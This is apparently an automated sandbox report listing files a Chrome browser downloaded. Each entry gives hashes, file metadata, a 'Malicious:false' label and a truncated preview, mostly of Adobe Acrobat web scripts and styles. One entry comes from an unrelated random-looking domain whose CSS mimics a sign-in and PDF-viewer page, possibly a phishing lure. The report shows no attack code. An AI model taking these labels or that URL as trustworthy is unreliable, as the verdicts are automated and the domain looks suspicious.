                  SHA-256:9625180944B837A5566DB12BF6E413785F0009926BE4F1E2D4A4F98E0BB231A4
                  SHA-512:4B3D019E0B1C861F345D0FC28DC340BD96D5B736179B0AFD985DD1DC50092BC3BFFBD353A53DF91BAAC7EFEAE25862F14B8AE7D6361B301C781FF4840AF5C1CC
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1115.1/bootstrap.js
                  Preview:/*! For license information please see bootstrap.js.LICENSE.txt */.(()=>{var e,t,o,r,n={Lr2o:(e,t,o)=>{e.exports=o("vWpX")},vWpX:(e,t,o)=>{"use strict";var r=o("AAps");Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var n,s,a,l=r(o("2Xkx")),c=r(o("b5pe")),p=r(o("nqKB")),d=r(o("QNma")),u=r(o("vPca")),m=r(o("khqL")),h=r(o("qavZ")),g=r(o("uYxp")),A=r(o("qJYQ")),C=r(o("i44B")),b=r(o("uqI5")),y=o("0sBc"),_=r(o("PZ3W")),v=r(o("uT4t")),E=r(o("vsH4")),T=o("d1ru"),O=r(o("K93r")),I=r(o("/hLX")),S=r(o("YWiy")),D=r(o("adDv")),w=r(o("Fsu/"));o("C8sF");var P=function getLabel(e){return"string"==typeof e?e:e.label},R="-listbox",M="-option-",x=(0,v.default)(n=(0,b.default)((a=s=function(e){function Autocomplete(e){var t;return(0,d.default)(this,Autocomplete),t=(0,m.default)(this,(0,h.default)(Autocomplete).call(this,e)),(0,C.default)((0,g.default)(t),"state",{value:"",showMenu:!1,results:[],selectedIndex:-1,isFocused:!1}),t.autocompleteId=(0,E.default)(),t}var t,o;return(0,A.default)
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (17276)
                  Category:downloaded
                  Size (bytes):17323
                  Entropy (8bit):5.2619528376407985
                  Encrypted:false
                  SSDEEP:
                  MD5:E684E912485F4F7D1D590FFFCA8006F1
                  SHA1:7569CD0B77AFB547E09B5E40969563F156F8AD3F
                  SHA-256:A131CB37EFA42C09AA6E530A7FBC95A6183D5A3BF6294F86CC2BF78FCAAC0662
                  SHA-512:AF18FD200459E4ABBD6C7F67B959AC9F867BAD4773D0BCECB36DEA31E8C10F153C553E8EAD7845248DF3FCCBC75FFC22D957E76F5923AC9B2B4D51A84A90CE84
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1349.0/6478-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},a=(new e.Error).stack;a&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[a]="b1b57789-be52-4dd6-aef9-8e5f8b16ae94",e._sentryDebugIdIdentifier="sentry-dbid-b1b57789-be52-4dd6-aef9-8e5f8b16ae94")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"939110932eed36816ac9d538606bc3479c9c8233"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[6478],{"/Ld9":(e,a,t)=>{"use strict";t.d(a,{D3:()=>isChromeViewerOrEmbedViewer,Dl:()=>getExtensionOpenLink,F7:()=>getIsExtensionInstalled,XD:()=>getExtensionDownloadLink,ar:()=>shouldScrollIntoViewport,dC:()=>isDeviceMobileOrTablet,fS:()=>getDownloadExtensionQueryParams,i7:()=>isChrome,qs:()=>getBrowser,un:()=>isEdge});var r=t("plsW");const isChrome=async()=>{const e=await r.providers.device();if(e.userA
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (2692)
                  Category:downloaded
                  Size (bytes):2746
                  Entropy (8bit):5.347110587008174
                  Encrypted:false
                  SSDEEP:
                  MD5:6FA20FB742850C5F28F9B44266BA07E5
                  SHA1:76318F3080D8C749F1E687FADFCC69201774EE72
                  SHA-256:F9C45FB9BD50D67354E0BEED7191EB7F9D92A9EFF7802B8070650E4DBE6FF80B
                  SHA-512:4BAA8023AE578622707C238BBDE0C7BFB5C23A873FDA225BF611BBD80D17170A09AD190DECAB73F6CC256DCB8552C3F299942BD2EA8DA5A8E188D67F14A0F396
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-files2-dropin/3.58.0_2.723.0/cdn-storage-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="e83454cd-d35a-49f5-a483-d45e1367b69e",e._sentryDebugIdIdentifier="sentry-dbid-e83454cd-d35a-49f5-a483-d45e1367b69e")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"3cf5c6bf825d9ccdf1ebf0bfd9737649fd92cc3f"},(self["webpackJsonp-files2"]=self["webpackJsonp-files2"]||[]).push([[8616],{GIEF:(e,t,o)=>{o.r(t),o.d(t,{default:()=>CDNStorageAPI});var r=o("plsW");class CDNStorageAPI{constructor(){this.getBlobUriFromSearchParams=()=>new URLSearchParams(window.location.search).get("blob-uri"),this.getBlobUri=()=>{const e=this.getBlobUriFromSearchParams();if(e)return e;const t=window.location.pathname.match(/\/blob\/([^?/]+)(\/|\?|$)/);return t&&t[1]},this.isCdnFile=async e=>{try{const
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (2062)
                  Category:downloaded
                  Size (bytes):2155
                  Entropy (8bit):5.029888695353183
                  Encrypted:false
                  SSDEEP:
                  MD5:536A44E811CF18F3FD6849E1809362A4
                  SHA1:54A06C31375403C15C59D5C7A2910F8845728F48
                  SHA-256:7D014821D7B559584CA1643C72054C1323A1CE5CABF67F3D3AA2EB8C31996E09
                  SHA-512:D6B115FBFDA206B8408EB4AD45B8453E0FA2B4ADDF8105488644F31CFF4C8D7ED3A4659DD28108D766775C0A767545D5AA6A88843FDD1592F155CACB51CCC053
                  Malicious:false
                  Reputation:unknown
                  URL:https://prod.adobeccstatic.com/unav/1.4/popover.bundle.css
                  Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */...universal-nav-container .popover-common-layout{height:auto;border-radius:0 0 .25rem .25rem;background:var(--appFrame-layer-2);line-height:1;max-height:calc(100vh - 10rem - .938rem);overflow-y:auto;position:absolute;margin-top:.5rem;display:none;align-items:flex-start;border-radius:.625rem;box-shadow:0 0 .188rem 0 rgba(0,0,0,.12),0 .188rem .5rem 0 rgba(0,0,0,.04),0 .25rem 1rem 0 rgba(0,0,0,.08);right:0;top:100%;transform:translate3d(0,0,0);z-index:1;cursor:auto}.universal-nav-container .popover-common-layout.rtl{left:0;right:auto}.universal-nav-container .unav-comp-app-switcher-popover{height:auto;border-radius:0 0 .25rem .25rem;background:var(--appFrame-layer-2);line-height:1;max-height:calc(100vh - 10rem - .938rem);overflow-y:auto;position:absolute;margin-top:.5rem;display:none;align-items:flex-start;border-radius:.625rem;box-shadow:0 0 .188rem 0 rgba(0,0,0,.12),0 .188rem .5rem 0 rgba(0,0,0,.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:troff or preprocessor input, ASCII text, with very long lines (7656)
                  Category:downloaded
                  Size (bytes):66464
                  Entropy (8bit):5.050281079221053
                  Encrypted:false
                  SSDEEP:
                  MD5:CA344841298EEDD995DB0268E6DAE183
                  SHA1:31057C6C81ADEFA4796A7931AAA48553C5C09ABA
                  SHA-256:11F0D5166D3992C0FB0FDEF41A0A943C8BCF1FF631306C9A2330FF476D62ADF5
                  SHA-512:5C291DBD61E85ABD6FB88B7BC853A51B80B909D0E7316BCCFCF08701EEB8AD8D7C61947734755F54A3B2C77F5F1F87CFA8FD5FA511635ADF802BFB837F2508BE
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-core/3.71.0/dc-extras.css
                  Preview:.spectrum-Alert{position:relative;display:inline-block;box-sizing:border-box;min-width:368px;min-height:38px;margin:8px 0;padding:20px;border-width:2px;border-style:solid;border-radius:4px}.spectrum-Alert-icon{position:absolute;display:block;top:20px;right:20px}.spectrum-Alert-header{display:inline-block;height:auto;min-height:0;margin:0;padding:0 30px 0 0;font-size:14px;font-weight:700;font-style:normal;line-height:14px;text-transform:none}.spectrum-Alert-content{display:block;margin:8px 0 0;padding:0;font-size:14px;word-wrap:break-word}.spectrum-Alert-footer{display:block;text-align:right;padding-top:.5rem}.spectrum-Alert-footer:empty{display:none}.spectrum-Alert-footer .spectrum-Button{margin-right:0;margin-left:.75rem}..spectrum--light .spectrum-Alert{background-color:#fff;color:#6e6e6e}.spectrum--light .spectrum-Alert-header{color:#2c2c2c}.spectrum--light .spectrum-Alert-content{color:#6e6e6e}.spectrum--light .spectrum-Alert--info{border-color:#2680eb}.spectrum--light .spectrum-Al
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):231674
                  Entropy (8bit):5.515718451118242
                  Encrypted:false
                  SSDEEP:
                  MD5:F5DCEC305216CFE31AEFD2CBDC334A22
                  SHA1:981D38A10A5EB16BA90B97C99A55B4CB565D6C7F
                  SHA-256:57287E5A8CD3601A1EFC344D0EA91A2F1D13E1342BF71E2735EF214C33D7A1C7
                  SHA-512:3A0497D1E2DBED198C5A84F8F40444857242C381CC83D90D89673844F79C10D5C94EB5800CD36B39B85111D8A486886A857B6C338FDA83C28B0281828CDEE694
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/store/_next/static/chunks/pages/email-9cee1bacc671589c.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[192],{194488:function(e,t,n){"use strict";n.r(t),n.d(t,{AppliedPromotionBadge:function(){return r.P4},AppliedPromotionBadgeContentModel:function(){return o.eJ},AppliedPromotionOutcomeType:function(){return i.nI},AppliedPromotionVariant:function(){return i.Bf},BadgePosition:function(){return i.h},BestValueBadge:function(){return r.qi},BestValueContentModel:function(){return o.jK},IconBadgeTypes:function(){return i.QL},IncrementalPriceContentModel:function(){return o.U1},IncrementalPricingBadge:function(){return r.PG},InfoBadge:function(){return r.Uq},InfoBadgeContentModel:function(){return o.vH},NetworkBenefitBadge:function(){return r.dJ},NetworkBenefitBadgeContentModel:function(){return o.rM},NetworkBenefitBadgeOfferType:function(){return i.CZ},PastDueBadgeContentModel:function(){return o.Si},PastDueCounterBadge:function(){return r.K7},PromoBadge:function(){return r.yg},PromoBadgeContentModel:function(){return o.pp},TrialBadge:fu
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                  Category:downloaded
                  Size (bytes):162092
                  Entropy (8bit):5.358253527024248
                  Encrypted:false
                  SSDEEP:
                  MD5:A3505E5F36D1D9F0F23AF0E3883DDC2E
                  SHA1:E0BD5EBEE260A3A1A7D944BECDA61066AC7FB467
                  SHA-256:083175167B728083881C2347CF17997AF987E5EF9B831EAF102C3E698878E218
                  SHA-512:9E489E4AEA33A9038AB67041253DE3650533F30BE547CB079F0D9FD3659243AB3EB80FDF262E3E1DBC7C6977598F90DC7C373FDA8D54EAC650F514205C13EA97
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/8559-chunk.js
                  Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[8559],{Lr2o:(e,t,o)=>{e.exports=o("vWpX")},vWpX:(e,t,o)=>{"use strict";var i=o("AAps");t.default=void 0;var r,n,a,s=i(o("2Xkx")),l=i(o("b5pe")),d=i(o("nqKB")),c=i(o("QNma")),u=i(o("vPca")),p=i(o("khqL")),h=i(o("qavZ")),f=i(o("uYxp")),g=i(o("qJYQ")),y=i(o("i44B")),b=i(o("uqI5")),m=o("0sBc"),v=i(o("PZ3W")),w=i(o("uT4t")),_=i(o("vsH4")),S=o("d1ru"),P=i(o("K93r")),T=i(o("/hLX")),x=i(o("YWiy")),E=i(o("adDv")),D=i(o("Fsu/"));o("C8sF");var C=function getLabel(e){return"string"==typeof e?e:e.label},O="-listbox",R="-option-",z=(0,w.default)(r=(0,b.default)((a=n=function(e){function Autocomplete(e){var t;return(0,c.default)(this,Autocomplete),t=(0,p.default)(this,(0,h.default)(Autocomplete).call(this,e)),(0,y.default)((0,f.default)(t),"state",{value:"",showMenu:!1,results:[],selectedIndex:-1,isFocused:!1}),t.autocompleteId=(0,_.default)(),t}var t,o;return(0,g.default)(Autocomplete,e),(0,u.default)(Autocomplete,[{key:"UNSA
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (2707)
                  Category:downloaded
                  Size (bytes):2765
                  Entropy (8bit):5.275520409999734
                  Encrypted:false
                  SSDEEP:
                  MD5:07D575EE50FE9640F0FA0A6A91CC1865
                  SHA1:238A653CF1E6AB9843D4D4EED992F6A60F67D1DF
                  SHA-256:349C900F2325B59A3A280AD37153B0E8CA2C05FB800F48D42D7054F81D7D04EA
                  SHA-512:FFA945698C73D0D389FDF02C8C874A68C432FF4936FA5B700136AAFF82A0B3CC5138413386E1E903F1BE54C6F59DA75FD65358E082D6D5FDFE940F3F77109BAF
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dcpreviewdropin/3.46.1_2.1134.0/previewProvider-chunk.js
                  Preview:"use strict";(self["webpackJsonp-preview"]=self["webpackJsonp-preview"]||[]).push([[4971],{Ehmy:(e,t,i)=>{i.r(t),i.d(t,{default:()=>o,getRenditionProvider:()=>getRenditionProvider});var r=i("plsW"),n=i("bzSf"),s=i("kbXN");const getRenditionProvider=()=>r.providers.rendition(null);const o=class PreviewProvider{constructor(){this.renditionPromise=getRenditionProvider(),this.bufferPromise=null,this.cnpdfFetcherPromise=null,this.openDocumentResult=null,this.mimeType,this.commonDocOpenParams={assetType:"/external",password:"",includeActions:!0,forceCacheless:!1,useAJS:!0,useDCAPI:!1,enableExternal:!1,enableLinearization:!1,shouldUseModernViewer:!0,linearizationBlockSize:65536,storePDFHash:!1}}ready(){return this}init(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{};e.bufferPromise&&(this.bufferPromise=e.bufferPromise),e.cnpdfFetcherPromise&&(this.cnpdfFetcherPromise=e.cnpdfFetcherPromise)}invokeOpenPDF(e){return!(0,n.BE)()&&this.bufferPromise?((0,n.bZ)("providerOpenPDFStart
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                  Category:downloaded
                  Size (bytes):75907
                  Entropy (8bit):5.625658318985896
                  Encrypted:false
                  SSDEEP:
                  MD5:77416A12081AFD8CA65195490E9BBD45
                  SHA1:C3EECDEB3BBF06541FE70D017F6C840FC0E50663
                  SHA-256:29D1AC682FACC3E4CFE0D07BD9196F4F1278545BF44616234778B11997BAA040
                  SHA-512:D329B59FEF9C5923FBD5B02F65E7EA4F3438B1A3389D0F4D05D5C2D5FB0BD0283517217ECE4A1DA4B4945EA7301ECD153CF907CC8E7D7D385103F32BF05724E5
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/7435-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[7435],{eiQX:(e,n,t)=>{"use strict";t.d(n,{a:()=>B});var o=t("VjBA"),r=t("YWiy"),i=t("ANuh"),a=t("Zm2D"),s=t("TQQ+"),l=t.n(s),c=t("GWyE"),d=t("0rPo"),u=t("EVtp"),A=t("T+xm"),_=t.n(A),g=t("I/yI"),p=t("Ntb/"),m=t("WsOM");const C=(0,i.A)((e=>{(0,r.useEffect)((()=>{(0,m.xm)(e.analyticsContextName,e.verbId)}),[]);const n=r.createElement(u.Button,{"aria-label":"signInWithGoogleText",UNSAFE_className:l().GoogleBtn,onPress:()=>e.onPress(!0)},(t=_(),r.createElement(p.Icon,{size:"S",slot:"description"},r.createElement(t,{viewBox:"0 0 20 20",width:"20",height:"20"}))),r.createElement(a.FormattedMessage,{id:"qna.optin.signIn.frictionless.google"}));var t;const o=e.isPHEnabled?"qna.welcomeMessage.susiBubble.anon.body":"qna.welcomeMessage.susiBubble.anon.phDisabled.body";return r.createElement(c.View,{UNSAFE_className:`${l().eduView} ${"dark"===e.currentTheme?l().eduViewBackgroundDark:l().eduViewBackgroundLight} ${l().frictionlessComp
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                  Category:downloaded
                  Size (bytes):112260
                  Entropy (8bit):5.608229572546977
                  Encrypted:false
                  SSDEEP:
                  MD5:8F9ED5EF47A19680F87A89673D1DAECA
                  SHA1:7938F6D99095004DA7F8288D5F896CE6EA6E8376
                  SHA-256:EF101D466AFFB58129FCF79081D9D5F2B757B1FA78B1DB2D259FB3E05AC645D5
                  SHA-512:4BFEBE8C5FA3DD305558D1CADA80CBB7927497AB3FD3F7490CC983ADDDB3885EDD16CF4DAAA31C5442E6E8A41909CD2CEE92B0980C89160FDE5B69AAD6E5811E
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/2255-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[2255],{F52N:(e,t,r)=>{"use strict";t.N=function A4uChevronUp(e){var t=_extends({},e);return n.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),n.default.createElement("path",{fillRule:"evenodd",d:"M28,21.98a2,2,0,0,1-3.411,1.411l-6.578-6.572-6.578,6.572a2,2,0,0,1-2.874-2.773l.049-.049L16.6,12.585a2,2,0,0,1,2.825,0h0l7.989,7.983A1.989,1.989,0,0,1,28,21.98Z"}))};var n=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(r("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},_extends.apply(this,arguments)}},kwH1:(e,t,r)=>{"use strict";r.d(t,{A:()=>a});var n=r("3aG4"),i=r("abd3"),__decorate=function(e,t,r,n){var i,a=arguments.length,o=a<3?t:null===n?n=Object.getOwnPropertyDescriptor(t,r):n;if("object"==typeof Reflect&&
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (26765), with no line terminators
                  Category:downloaded
                  Size (bytes):26765
                  Entropy (8bit):5.114987586674101
                  Encrypted:false
                  SSDEEP:
                  MD5:1A862A89D5633FAC83D763886726740D
                  SHA1:E5CE3AA454C992A13FD406A9647D7AFBF831051F
                  SHA-256:5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
                  SHA-512:3BFAB627DC0EBFAE1176098C870B4D2747518E7EA91646303276191A4A846D47B2E80BB1EE2FA67271130ECCBC8B1152778C99917FC6C63EA45A184BD673BF0D
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/56Gysz9drikUEfcd952ul8911
                  Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), CFF, length 38004, version 1.0
                  Category:downloaded
                  Size (bytes):38004
                  Entropy (8bit):7.992415184542423
                  Encrypted:true
                  SSDEEP:
                  MD5:8D3C19E4ECCD8530EFC9E39326E0FC52
                  SHA1:083F5A3B3161541E62CE4002D9FD1731FCA640D2
                  SHA-256:5961262FD0CD492D39005E866EF7496F7DD4779EBD615A0FC5ADE35D4EEB8030
                  SHA-512:42A6D1D8F735582C18071CC8863E62799A2D5D29EA2E64597D2AEDA3C3661570FD25D849C10CA2E3CBD5B9BAF060C39113F20A7EE8E3F8BF55D42B4667340F87
                  Malicious:false
                  Reputation:unknown
                  URL:https://use.typekit.net/af/40207f/0000000000000000000176ff/27/l?primer=0635fba006f1437d962ae878ad04a353e0c3568e4d5bde3554eb7e3e05ddd02d&fvd=n3&v=3
                  Preview:wOF2OTTO...t....... .............................F....?DYNA.i?GDYN.Q..v.`..P...6.$..@....7. .$.)...Y..!..............$.<f...U...'?..~.?../..........._..M|..|.Q..ZI..w$......q.m.d..6s...I........B.g.g.w.GR.[...Y.:P....|J.*.....K4...5..@..(...8.&..G..oN......['{s........T.u...N.h..Y.4`......?..4=..#c..[........!:..-bm).P.\.+Z.."^..W.7Gu.6&.~.M..43*..x_.O.....w>..a]cX..%..N....h...`.....C.`...(.;.".(X:..%Mck..=L~.M...\..e...2.:.:...S6.M5.mL..|.w....,..} .">....6..$..7T.C!$..H...?O.._Hwf../H.i..{.<.H..@!q.CB.$.#;3....<........R.sgo8.M."..4.R.=HM...G......88.Y."{.]..y....J<....._....i...0.....?...%.......lT.b...<...+.p._}..*...^r..3..+\...."..2.+5....3...}d......Y(6@.8....U..Rf(G.r..'b)...7.v@..Y...;..@..6r&...>....D..e.........:.h.6...d.R.|..n......._/....^.....ADll4.." ...!9.Q.y....g....!.8[7..T"....d.# I.'.f...zUY...h.4.,0....j.....Yu "...@..k.)....N.B....tt4'..B..v%:V..:...*..>........v-.Io.b9..Ve.jH|yi.hDa>..=:...L...3}........k...z.+.N.`
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (7575), with no line terminators
                  Category:downloaded
                  Size (bytes):7575
                  Entropy (8bit):5.1554257655905715
                  Encrypted:false
                  SSDEEP:
                  MD5:8DFBAA7FC2C14D67EE67069E2AA854F7
                  SHA1:02DC0D55631CDE1296F779FAE9A3A34C5C09FC24
                  SHA-256:253DC35986C08BDA036B6C2C36AB97C5A7A42E750C6ED646DA1C47FBCE68A736
                  SHA-512:9024C5B778F42813313618EB37B6AA2AEBA513C1A8D272733AC4FDA2447363550CBDB5AB182B2B9CD5BB20049661E98DC66A2EBF85F3CB6DD19D8783D487B32F
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-web-app-dropin/3.71.0_2.210.0/translations-en-US.js
                  Preview:"use strict";(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[327],{t39f:e=>{e.exports=JSON.parse('{"APPS":"Apps","DOCUMENT_CLOUD":"Document Cloud","FILES":"Files","HOME":"Home","VIEWS":"For Viewing","REVIEWS":"For Review","SIGNATURES":"For Signature","ORGANIZER":"Organizer","SHARE":"Share","SHARED":"Shared","SHARED_DOCUMENTS":"Shared Documents","SIGN":"Sign","SIGN_OUT":"Sign Out","STARRED":"Starred","UPLOAD_ETC":"Upload etc.","SOMETHING_WENT_WRONG":"Something went wrong","TRY_LATER":"We\'re sorry for the inconvenience. Please try again later.","ACCESS_DENIED":"Access Denied","NO_ACCESS_MSG":"You do not have access to this service. Contact your IT administrator to gain access.","SIGN_IN_DIFF":"Sign in with a different account","IN_BETA_COHORT_PARA1":"Thank you for participating in the Beta program for the next generation of Adobe Document Cloud.","IN_BETA_COHORT_PARA2":"We are constantly adding exciting capabilities to the Beta, but this feature is still under dev
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (44222)
                  Category:downloaded
                  Size (bytes):44285
                  Entropy (8bit):5.568361274398028
                  Encrypted:false
                  SSDEEP:
                  MD5:9E6F70C0FEF4A2D63E6B4FFC828496FC
                  SHA1:6E9243398DF2158F08C73B1C36E5A276CAF2F72A
                  SHA-256:68950E32E0583E76A9BA6C01D0C68A2C835147831C4F1BB56F1A52E53A5EC0C9
                  SHA-512:49DC5AC464434C5DCBE02FA7AB15467FB955D7BE58393B29D771FA62A6FB3F873300027B8C28E219F2638A943DB7381FF4E41A52CF067B70897C84602123CF40
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-files2-dropin/3.58.0_2.723.0/storage-connectors-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="ee24d8f1-d67d-458b-bf8a-bff08741c848",e._sentryDebugIdIdentifier="sentry-dbid-ee24d8f1-d67d-458b-bf8a-bff08741c848")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"3cf5c6bf825d9ccdf1ebf0bfd9737649fd92cc3f"},(self["webpackJsonp-files2"]=self["webpackJsonp-files2"]||[]).push([[7247],{AXyZ:e=>{"use strict";e.exports=function(e){var t=[];return t.toString=function toString(){return this.map((function(t){var r=function cssWithMappingToString(e,t){var r=e[1]||"",n=e[3];if(!n)return r;if(t&&"function"==typeof btoa){var o=function toComment(e){var t=btoa(unescape(encodeURIComponent(JSON.stringify(e)))),r="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(t);retu
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (29141)
                  Category:downloaded
                  Size (bytes):29199
                  Entropy (8bit):5.376056686399917
                  Encrypted:false
                  SSDEEP:
                  MD5:B3387221F539A3DBE2406E086A1C338D
                  SHA1:231DE1232836BBDF0920322D11C83E621B05D9C9
                  SHA-256:24C1180896B469E3FCBB73B77786B944AFDD7A12D6907B2D99AA807B81900012
                  SHA-512:D1B72421983EA4499196276AAEF76D9E2F55D5F2A1DAB5F887ADA4591E55CFBEABB6DA16D9FBEB2554998136BEC9E7B625E1DFF194E02115D86106416C4B0FBD
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/genAICoreAPIs-chunk.js
                  Preview:"use strict";(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[1431],{ZnEp:(e,t,n)=>{n.r(t),n.d(t,{default:()=>_});var i=n("plsW"),o=n("835Y"),s=n.n(o),__awaiter=function(e,t,n,i){return new(n||(n=Promise))((function(o,s){function fulfilled(e){try{step(i.next(e))}catch(e){s(e)}}function rejected(e){try{step(i.throw(e))}catch(e){s(e)}}function step(e){e.done?o(e.value):function adopt(e){return e instanceof n?e:new n((function(t){t(e)}))}(e.value).then(fulfilled,rejected)}step((i=i.apply(e,t||[])).next())}))};const createReadableStream=()=>{let e;return{chunkListener:t=>{var n;try{e.enqueue(t),"Completed"===(null===(n=null==t?void 0:t.end_of_stream)||void 0===n?void 0:n.status)&&e.close()}catch(t){e.error(t)}},onError:t=>{e.error(t)},response:new ReadableStream({start(t){return __awaiter(this,void 0,void 0,(function*(){try{e=t}catch(t){e.error(t)}}))}})}},evaluateCurrentFeatureLimits=function(e){let t=arguments.length>1&&void 0!==arguments[1]&&arguments[1];const{feature_
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):404778
                  Entropy (8bit):5.5049632392868775
                  Encrypted:false
                  SSDEEP:
                  MD5:99D8541341F027B8E3FB84B0D5DAAB36
                  SHA1:3C878CE6FF52CDFD6278796490730AF8307276ED
                  SHA-256:4011645F2B67B3596E626AFB1AB7B22C8A7D112C856712CCC7EE5903E5EFDF1D
                  SHA-512:35D267C41CAA6C861E40A0358308F85E49C60B4671D7E50A33918F70AADF702D782AF21366AAAA182C148CFBA625E1D3E4C3C00FFCEF62404CA6C615A68D7AC3
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dcpreviewdropin/3.46.1_2.1134.0/7920-chunk.js
